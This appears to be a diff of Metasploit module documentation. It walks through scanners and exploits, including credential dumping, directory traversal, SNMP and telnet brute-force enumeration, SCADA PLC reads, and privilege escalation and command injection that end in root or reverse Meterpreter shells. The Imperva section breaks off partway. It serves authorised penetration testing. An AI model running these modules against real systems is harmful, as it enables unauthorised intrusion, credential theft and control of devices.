+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > check
+  [+] 172.16.158.131:6060 - The target is vulnerable.
+  [*] Checked 1 of 1 hosts (100% complete)
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > run
+
+  [*] 172.16.158.131:6060 - Found weak credentials (admin:admin)
+
+  ManageEngine DeviceExpert User Credentials
+  ==========================================
+
+   Username  Password  Password Hash                     Role           E-mail                Password Salt
+   --------  --------  -------------                     ----           ------                -------------
+   admin     admin     3a4ebf16a4795ad258e5408bae7be341  Administrator  noreply@zohocorp.com  12345678
+
+  [*] Credentials saved in: /Users/jvazquez/.msf4/loot/20140926165907_default_172.16.158.131_manageengine.dev_118155.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  msf5 auxiliary(scanner/http/manageengine_deviceexpert_user_creds) > creds 172.16.158.131
+  Credentials
+  ===========
+
+  host            service           public  private  realm  private_type
+  ----            -------           ------  -------  -----  ------------
+  172.16.158.131  6060/tcp (https)  admin   admin           Password
+  ```
+
@@ -0,0 +1,31 @@
+## Description
+
+This module scans a given range of IP address and queries web servers for the options that are available on them.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/options```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/options
+msf auxiliary(scanner/http/options) > set RHOSTS 192.168.1.200-210
+RHOSTS => 192.168.1.200-210
+msf auxiliary(scanner/http/options) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/http/options) > run
+
+[*] 192.168.1.203 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.204 allows OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK methods
+[*] 192.168.1.205 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.206 allows OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK methods
+[*] 192.168.1.208 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] 192.168.1.209 allows GET,HEAD,POST,OPTIONS,TRACE methods
+[*] Scanned 11 of 11 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/options) >
+```
@@ -0,0 +1,48 @@
+## Description
+
+  This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
+  allowing to read arbitrary files with the web server privileges.
+
+
+## Vulnerable Application
+
+  [RIPS](http://rips-scanner.sourceforge.net/) is a static source code analyser
+  for vulnerabilities in PHP scripts.
+
+  * [RIPS v0.54 Source](https://sourceforge.net/projects/rips-scanner/files/rips-0.54.zip/download)
+
+
+## Verification
+
+  1. Start `msfconsole`
+  2. `use auxiliary/scanner/http/rips_traversal`
+  3. `set RHOSTS <rhost>`
+  4. `set FILEPATH </path/to/file>`
+  5. `run`
+
+
+## Scenarios
+
+  ```
+  msf5 > use auxiliary/scanner/http/rips_traversal
+  msf5 auxiliary(scanner/http/rips_traversal) > set rhosts 172.16.191.188
+  rhosts => 172.16.191.188
+  msf5 auxiliary(scanner/http/rips_traversal) > set filepath /etc/hosts
+  filepath => /etc/hosts
+  msf5 auxiliary(scanner/http/rips_traversal) > run
+  
+   127.0.0.1        localhost
+    
+    # The following lines are desirable for IPv6 capable hosts
+    ::1     localhost ip6-localhost ip6-loopback
+    ff02::1 ip6-allnodes
+    ff02::2 ip6-allrouters
+    
+    127.0.0.1 wpad
+    
+   
+  [+] File saved in: /root/.msf4/loot/20190208082709_default_172.16.191.188_rips.traversal_654208.txt
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```
+
@@ -0,0 +1,35 @@
+## Description 
+This module scrapes data from a specific web page based on a regular expression.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/scraper```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Options
+
+### PATH 
+
+The path from where the data is to be scraped from.
+ 
+### PATTERN
+
+A regular expression to capture data from webpage. Default value:`<title>(.*)</title>` which simply grabs the page title.
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/http/scraper
+msf auxiliary(scanner/http/scraper) > set RHOSTS 1.1.1.18
+RHOSTS => 1.1.1.18
+msf auxiliary(scanner/http/scraper) > run 
+
+[+] 1.1.1.18 / [Index of /]
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/scraper) >
+```
+
+The title of `1.1.1.18/` page is `Index of /`.
+
@@ -0,0 +1,60 @@
+## Description
+
+This module check and exploits a Directory Traversal vulnerability in Total.js framework < 3.2.4 (CVE-2019-8903). Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml, woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache, manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic.
+
+## Vulnerable Application
+
+Affecting total.js package, versions:
+
+* >=2.1.0 <2.1.1
+* >=2.2.0 <2.2.1
+* >=2.3.0 <2.3.1
+* >=2.4.0 <2.4.1
+* >=2.5.0 <2.5.1
+* >=2.6.0 <2.6.3
+* >=2.7.0 <2.7.1
+* >=2.8.0 <2.8.1
+* >=2.9.0 <2.9.5
+* >=3.0.0 <3.0.1
+* >=3.1.0 <3.1.1
+* >=3.2.0 <3.2.4
+
+## Verification Steps
+
+1. On a Node v8 environment do: `npm install total.js@3.2.3`
+2. Install an app on top of the Total.js framework, something like [Total.js CMS](https://github.com/totaljs/cms)
+  * `git clone https://github.com/totaljs/cms.git`
+  * `cd cms && npm install`
+3. Start `msfconsole`
+4. `use auxiliary/scanner/http/totaljs_traversal`
+5. `set RHOST <IP>`
+6. `set RPORT <PORT>`
+7. `run`
+8. Verify you get Total.js version if the target is vulnerable!
+
+## Options
+
+* **TARGETURI**: Path to Total.js App installation (“/” is the default)
+* **DEPTH**: Traversal depth (“1” is the default)
+* **FILE**: File to obtain (“databases/settings.json” is the default for Total.js CMS App)
+
+## Scenario
+
+### Tested on Total.js framework 3.2.0 and Total.js CMS 12.0.0
+
+```
+msf5 > use auxiliary/scanner/http/totaljs_traversal 
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RHOST 192.168.2.59
+RHOST => 192.168.2.59
+msf5 auxiliary(scanner/http/totaljs_traversal) > set RPORT 8320
+RPORT => 8320
+msf5 auxiliary(scanner/http/totaljs_traversal) > run
+[*] Running module against 192.168.2.59
+
+[*] Total.js version is: ^3.2.0
+[*] App name: CMS
+[*] App description: A simple and powerful CMS solution written in Total.js / Node.js.
+[*] App version: 12.0.0
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/totaljs_traversal) >
+```
@@ -0,0 +1,60 @@
+
+## Vulnerable Application
+
+This applies to all versions of SAP software.
+
+The SAP Management Console (SAP MC) provides a common framework for centralized system management. It allows you to monitor and perform basic administration tasks on the SAP system centrally, which simplifies system administration. (https://help.sap.com/doc/saphelp_nwpi711/7.1.1/en-US/fa/ec218eb89b4424a9a0b423b0643952/frameset.htm)
+
+SAP exposes an API on port tcp/50013 with the SOAP Management Console. Some webmethods are authenticated with a valid login/password and others are unauthenticated and reacheable by default.
+
+With this module you can list the config files that SAP loads when starts the SAP server. This unauthenticated information disclosure can be used in a more advanced attack to get knowledge about in which paths SAP stores the config files to, for example, retrieve sensitive data or trojanize the startup process.
+
+## Verification Steps
+
+  Example steps:
+
+  1. Install the SAP application. SAP provides a docker container for development purposes: https://developers.sap.com/tutorials/hxe-ua-install-using-docker.html
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles```
+  4. Set up the server IP: ```set RHOSTS 192.168.10.45```
+  5. Do: ```run```
+  6. You will receive the list of SAP configuration files on the server.
+
+## Options
+
+  **RHOSTS**: Set up which server or servers do you want to test
+
+  **RPORT**: Port tcp/50013 set up by default
+
+  In case of more advanced deployments you can set up the SSL parameters here:
+
+  **SSL**: Set to ```true```
+
+
+## Scenarios
+
+### Example
+
+
+  ```
+msf5 > use auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
+msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > show options
+
+Module options (auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target address range or CIDR identifier
+   RPORT    50013            yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS  1                yes       The number of concurrent threads
+   URI      /                no        Path to the SAP Management Console 
+   VHOST                     no        HTTP server virtual host
+
+ msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > set RHOSTS 192.168.10.45
+ RHOSTS => 192.168.10.45
+ msf5 auxiliary(scanner/sap/sap_mgmt_con_listconfigfiles) > run
+ [...]
+
+  ```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+  Unitronics Vision PLCs using PCOM protocol
+
+## Verification Steps
+
+  1. Do: `use scanner/scada/pcomclient`
+  2. Do: `set RHOST=IP` where IP is the IP address of the target
+  3. Do: `run` to send PCOM command
+
+ ## Scenarios
+
+   ```
+msf > use scanner/scada/pcomclient
+msf auxiliary(scanner/scada/pcomclient) > show options
+
+Module options (auxiliary/scanner/scada/pcomclient):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   ADDRESS  0                yes       PCOM memory address (0 - 65535)
+   LENGTH   3                yes       Number of values to read (1 - 255) (read only)
+   OPERAND  MI               yes       Operand type (Accepted: Input, Output, SB, MB, MI, SI, ML, SL)
+   RHOST                     yes       The target address
+   RPORT    20256            yes       The target port (TCP)
+   UNITID   0                no        Unit ID (0 - 127)
+   VALUES                    no        Values to write (0 - 65535 each) (comma separated) (write only)
+
+
+Auxiliary action:
+
+   Name  Description
+   ----  -----------
+   READ  Read values from PLC memory
+
+
+msf auxiliary(scanner/scada/pcomclient) > set RHOST 192.168.1.1
+RHOST => 192.168.1.1
+msf auxiliary(scanner/scada/pcomclient) > run
+
+[*] 192.168.1.1:20256 - Reading 03 values (MI) starting from 0000 address
+[+] 192.168.1.1:20256 - [00000] : 0
+[+] 192.168.1.1:20256 - [00001] : 1
+[+] 192.168.1.1:20256 - [00002] : 0
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/scada/pcomclient) >
+```
@@ -0,0 +1,78 @@
+## Description
+This module performs a detailed enumeration of a host or a range through SNMP protocol. It supports hardware, software, and network information.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Scenarios 
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enum
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) > set RHOSTS 1.1.1.2
+RHOSTS => 1.1.1.2
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) > run
+
+[*] System information
+
+Hostname                : Netgear-GSM7224
+Description             : GSM7224 L2 Managed Gigabit Switch
+Contact                 : dookie
+Location                : Basement
+Uptime snmp             : 56 days, 00:36:28.00
+Uptime system           : -
+System date             : -
+
+[*] Network information
+
+IP forwarding enabled   :  no
+Default TTL             :  64
+TCP segments received   :  20782
+TCP segments sent       :  9973
+TCP segments retrans.   :  9973
+Input datagrams         :  4052407
+Delivered datagrams     :  1155615
+Output datagrams        :  18261
+
+[*] Network interfaces
+
+Interface [ up ] Unit: 1 Slot: 0 Port: 1 Gigabit - Level
+
+	Id              : 1
+	Mac address     : 00:0f:b5:fc:bd:24
+	Type            : ethernet-csmacd
+	Speed           : 1000 Mbps
+	Mtu             : 1500
+	In octets       : 3716564861
+	Out octets      : 675201778
+...snip...
+[*] Routing information
+
+     Destination         Next hop             Mask           Metric
+
+         0.0.0.0      5.1.168.192          0.0.0.0                1
+       1.0.0.127        1.0.0.127  255.255.255.255                0
+
+[*] TCP connections and listening ports
+
+   Local address       Local port   Remote address      Remote port            State
+
+         0.0.0.0               23          0.0.0.0                0           listen
+         0.0.0.0               80          0.0.0.0                0           listen
+         0.0.0.0             4242          0.0.0.0                0           listen
+       1.0.0.127             2222          0.0.0.0                0           listen
+
+[*] Listening UDP ports
+
+   Local address       Local port
+
+         0.0.0.0                0
+         0.0.0.0              161
+         0.0.0.0              514
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(auxiliary/scanner/snmp/snmp_enum) >
+```
@@ -0,0 +1,32 @@
+## Description
+This module will simply scan a range of hosts and queries via SNMP to determine any available shares.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enumshares```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enumshares
+msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 1.1.1.200-211
+RHOSTS => 1.1.1.200-211
+msf auxiliary(scanner/snmp/snmp_enumshares) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/snmp/snmp_enumshares) > run 
+
+[+] 1.1.1.201 
+	shared_docs -  (C:\Documents and Settings\Administrator\Desktop\shared_docs)
+[*] Scanned 02 of 11 hosts (018% complete)
+[*] Scanned 03 of 11 hosts (027% complete)
+[*] Scanned 05 of 11 hosts (045% complete)
+[*] Scanned 07 of 11 hosts (063% complete)
+[*] Scanned 09 of 11 hosts (081% complete)
+[*] Scanned 11 of 11 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/snmp/snmp_enumshares) > 
+```
+
@@ -0,0 +1,33 @@
+## Description
+This module queries a range of hosts via SNMP and gathers a list of usernames on the remote system.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/snmp/snmp_enumusers```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [NUMBER OF THREADS]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/snmp/snmp_enumusers
+msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 1.1.1.200-211
+RHOSTS => 1.1.1.200-211
+msf auxiliary(scanner/snmp/snmp_enumusers) > set THREADS 11
+THREADS => 11
+msf auxiliary(scanner/snmp/snmp_enumusers) > run 
+
+[+] 1.1.1.201 Found Users: ASPNET, Administrator, Guest, HelpAssistant, SUPPORT_388945a0, victim 
+[*] Scanned 02 of 12 hosts (016% complete)
+[*] Scanned 05 of 12 hosts (041% complete)
+[*] Scanned 06 of 12 hosts (050% complete)
+[*] Scanned 07 of 12 hosts (058% complete)
+[*] Scanned 08 of 12 hosts (066% complete)
+[*] Scanned 09 of 12 hosts (075% complete)
+[*] Scanned 11 of 12 hosts (091% complete)
+[*] Scanned 12 of 12 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/snmp/snmp_enumusers) >
+```
+
@@ -0,0 +1,74 @@
+## Description
+This module will test a telnet login with a list of provided credentials on a range of machines and report successful logins. It allows you to pass credentials in a number of ways. You can specifically set a username and password, you can pass a list of usernames and a list of passwords for it to iterate through, or you can provide a file that contains usernames and passwords separated by a space.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/telnet_login```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [NUMBER OF THREADS]```
+4. Do: ```set USER_FILE [USERNAME FILE]```
+5. Do: ```set PASS_FILE [PASSWORD FILE]```
+6. Do: ```run```
+
+## Options
+
+
+### BLANK PASSWORD 
+
+When set to `true`, it'll bruteforce with blank passwords for all users. Default value is `false`.
+
+### USERNAME
+
+Only one username to authenticate with.
+
+### PASSWORD
+
+Only one password to authenticate with. 
+
+### USERPASS_FILE 
+
+File containing username and passwords separated by space, one pair one line.
+
+### USER_FILE
+
+File containing usernames one per line.
+
+### PASS_FILE
+
+File containing passwords one per line.
+
+
+## Scenarios 
+
+In this scan we have provided list of username and passwords files separately. 
+
+```
+msf > use use auxiliary/scanner/telnet/telnet_login
+msf auxiliary(scanner/telnet/telnet_login) > set RHOSTS 1.1.1.0/24
+RHOSTS => 1.1.1.0/24
+msf auxiliary(scanner/telnet/telnet_login) > set THREADS 254
+THREADS => 254
+msf auxiliary(scanner/telnet/telnet_login) > set BLANK_PASSWORDS false
+BLANK_PASSWORDS => false
+msf auxiliary(scanner/telnet/telnet_login) > set USER_FILE users.txt
+USER_FILE => users.txt
+msf auxiliary(scanner/telnet/telnet_login) > set PASS_FILE passwords.txt
+PASS_FILE => passwords.txt
+msf auxiliary(scanner/telnet/telnet_login) > set VERBOSE false
+VERBOSE => false
+msf auxiliary(scanner/telnet/telnet_login) > run
+
+[+] 1.1.1.116 - SUCCESSFUL LOGIN root : s00p3rs3ckret
+[*] Command shell session 1 opened (1.1.1.101:50017 -> 1.1.1.116:23) at 2010-10-08 06:48:27 -0600
+[+] 1.1.1.116 - SUCCESSFUL LOGIN admin : s00p3rs3ckret
+[*] Command shell session 2 opened (1.1.1.101:41828 -> 1.1.1.116:23) at 2010-10-08 06:48:28 -0600
+[*] Scanned 243 of 256 hosts (094% complete)
+[+] 1.1.1.56 - SUCCESSFUL LOGIN msfadmin : msfadmin
+[*] Command shell session 3 opened (1.1.1.101:49210 -> 1.1.1.56:23) at 2010-10-08 06:49:07 -0600
+[*] Scanned 248 of 256 hosts (096% complete)
+[*] Scanned 250 of 256 hosts (097% complete)
+[*] Scanned 255 of 256 hosts (099% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/telnet/telnet_login) >
+```
@@ -0,0 +1,31 @@
+## Description
+This module will scan a range of machines and prints the banner, usually containing the version of any telnet servers that are running on it.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/telnet/telnet_version```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set THREADS [number of threads]```
+4. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/telnet/telnet_version 
+msf auxiliary(scanner/telnet/telnet_version) > set RHOSTS 1.1.1.0/24
+RHOSTS => 1.1.1.0/24
+msf auxiliary(scanner/telnet/telnet_version) > set THREADS 254
+THREADS => 254
+msf auxiliary(scanner/telnet/telnet_version) > run
+
+[*] 1.1.1.2:23 TELNET (GSM7224) \x0aUser:
+[*] 1.1.1.56:23 TELNET Ubuntu 8.04\x0ametasploitable login:
+[*] 1.1.1.116:23 TELNET Welcome to GoodTech Systems Telnet Server for Windows NT/2000/XP (Evaluation Copy)\x0a\x0a(C) Copyright 1996-2002 GoodTech Systems, Inc.\x0a\x0a\x0aLogin username:
+[*] Scanned 254 of 256 hosts (099% complete)
+[*] Scanned 255 of 256 hosts (099% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/telnet/telnet_version) >
+```
+
+
@@ -0,0 +1,21 @@
+## Vulnerable Application
+
+Many devices produced by Ubiquiti are affected by this issue.
+
+## Verification Steps
+
+  1. Locate a network known or suspected to house Ubiquiti devices
+  2. Start msfconsole
+  3. Do: `use auxiliary/scanner/ubiquiti_discovery`
+  4. Do: `set RHOSTS <some_targets>`
+  5. Do: `run`
+
+## Scenarios
+
+  An example run against a Ubiquiti EdgeRouter-X:
+
+
+  ```
+  msf5 auxiliary(scanner/ubiquiti/ubiquiti_discover) > run
+  [+] 192.168.1.1:10001 Ubiquiti Discovery metadata: {"ips"=>["192.168.0.1", "192.168.1.1"], "macs"=>["80:2a:a8:df:aa:bb", "f8:1e:df:f8:aa:bb"], "name"=>"ubnt", "model_short"=>"ER-X", "firmware"=>"EdgeRouter.ER-e50.v1.9.7+hotfix.4.5024279.171006.0255"}
+  ```
@@ -0,0 +1,23 @@
+## Description
+This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service. If it is a WinRM service, it also gathers the Authentication Methods supported.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/winrm/winrm_auth_methods```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/winrm/winrm_auth_methods
+msf auxiliary(scanner/winrm/winrm_auth_methods) > set RHOSTS 1.1.1.10
+RHOSTS => 1.1.1.10
+msf auxiliary(scanner/winrm/winrm_auth_methods) > run 
+
+[+] 1.1.1.10:5985: Negotiate protocol supported
+[+] 1.1.1.10:5985: Basic protocol supported
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/winrm/winrm_auth_methods) >
+```
@@ -0,0 +1,34 @@
+## Description
+This module runs arbitrary Windows commands using the WinRM Service. It needs login credentials to do so.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/winrm/winrm_cmd```
+2. Do: ```set CMD [WINDOWS COMMAND]```
+3. Do: ```set RHOSTS [IP]```
+4. Do: ```set USERNAME [USERNAME]```
+5. Do: ```set PASSWORD [PASSWORD]```
+6. Do: ```run```
+
+## Scenarios
+
+```
+msf > use auxiliary/scanner/winrm/winrm_cmd
+msf auxiliary(scanner/winrm/winrm_cmd) > set CMD hostname
+CMD => hostname
+msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 1.1.1.10
+RHOSTS => 1.1.1.10
+msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
+USERNAME => Administrator
+msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD vagrant 
+PASSWORD => vagrant
+msf auxiliary(scanner/winrm/winrm_cmd) > run 
+
+[+] vagrant-2008R2
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+
+msf auxiliary(scanner/winrm/winrm_cmd) > 
+```
+
@@ -0,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt 
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+
@@ -0,0 +1,106 @@
+## Description
+
+  This module exploits a vulnerability in the FreeBSD kernel,
+  when running on 64-bit Intel processors.
+
+  By design, 64-bit processors following the X86-64 specification will
+  trigger a general protection fault (GPF) when executing a SYSRET
+  instruction with a non-canonical address in the RCX register.
+
+  However, Intel processors check for a non-canonical address prior to
+  dropping privileges, causing a GPF in privileged mode. As a result,
+  the current userland RSP stack pointer is restored and executed,
+  resulting in privileged code execution.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * FreeBSD 8.3-RELEASE (amd64)
+  * FreeBSD 9.0-RELEASE (amd64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/freebsd/local/intel_sysret_priv_esc`
+  4. `set SESSION <SESSION>`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### FreeBSD 9.0-RELEASE
+
+  ```
+  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
+  lhost => 123.123.123.188
+  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
+
+  [!] SESSION may not be compatible with this module.
+  [*] Started reverse TCP handler on 123.123.123.188:4444 
+  [+] FreeBSD version 9.0-RELEASE appears vulnerable
+  [+] System architecture amd64 is supported
+  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
+  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
+  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
+  [*] Max line length is 131073
+  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
+  [*] Launching exploit...
+  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
+  [*] 
+  [*] [*] Retrieving host information...
+  [*]     [+] CPU: GenuineIntel
+  [*]     [+] sysname: FreeBSD
+  [*]     [+] release: 9.0-RELEASE
+  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
+  [*]     [+] machine: amd64
+  [*] [*] Validating target OS and version...
+  [*]     [+] Vulnerable :-)
+  [*] [*] Resolving kernel addresses...
+  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
+  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
+  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
+  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
+  [*]     [+] Resolved Xpage to 0xffffffff80b03240
+  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
+  [*]     [+] Resolved Xalign to 0xffffffff80b03080
+  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
+  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
+  [*] [*] Setup...
+  [*]     [+] Trigger code...
+  [*]     [+] Trampoline code...
+  [*] [*] Fire in the hole!
+  [*] [*] Got root!
+  [+] Success! Executing payload...
+  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
+  [+] Deleted /tmp/.mTaR4rAPd.c
+  [+] Deleted /tmp/.mTaR4rAPd
+  [+] Deleted /tmp/.LBGkIVh
+
+  id
+  uid=0(root) gid=0(wheel) groups=0(wheel)
+  uname -a
+  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
+  ```
+
@@ -0,0 +1,205 @@
+## Description
+
+This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
+
+## Vulnerable Application
+
+Imperva SecureSphere 13.0/13.1/13.2
+
+## Verification Steps
+
+1. `use exploit/linux/http/imperva_securesphere_exec`
+2. `set RHOST [TARGET IP]`
+3. `set PASS [Agent registration password]` if the target has been set to gateway mode
+4. Run `check`
+5. Verify that the result is `The target is vulnerable.`
+6. `set payload linux/x64/meterpreter/reverse_tcp`
+7. `set LHOST [IP]`
+8. Run `exploit`
+9. Verify that the reverse shell is obtained
+
+## Scenarios
+
+Imperva Secure 13.0 Pre-FTL mode:
+```
+msf5 > use exploit/linux/http/imperva_securesphere_exec
+msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
+RHOST => 192.168.146.201
+msf5 exploit(linux/http/imperva_securesphere_exec) > check
+[+] 192.168.146.201:443 The target is vulnerable.
+msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
+LHOST => 192.168.146.215
+msf5 exploit(linux/http/imperva_securesphere_exec) > show options
+
+Module options (exploit/linux/http/imperva_securesphere_exec):
+
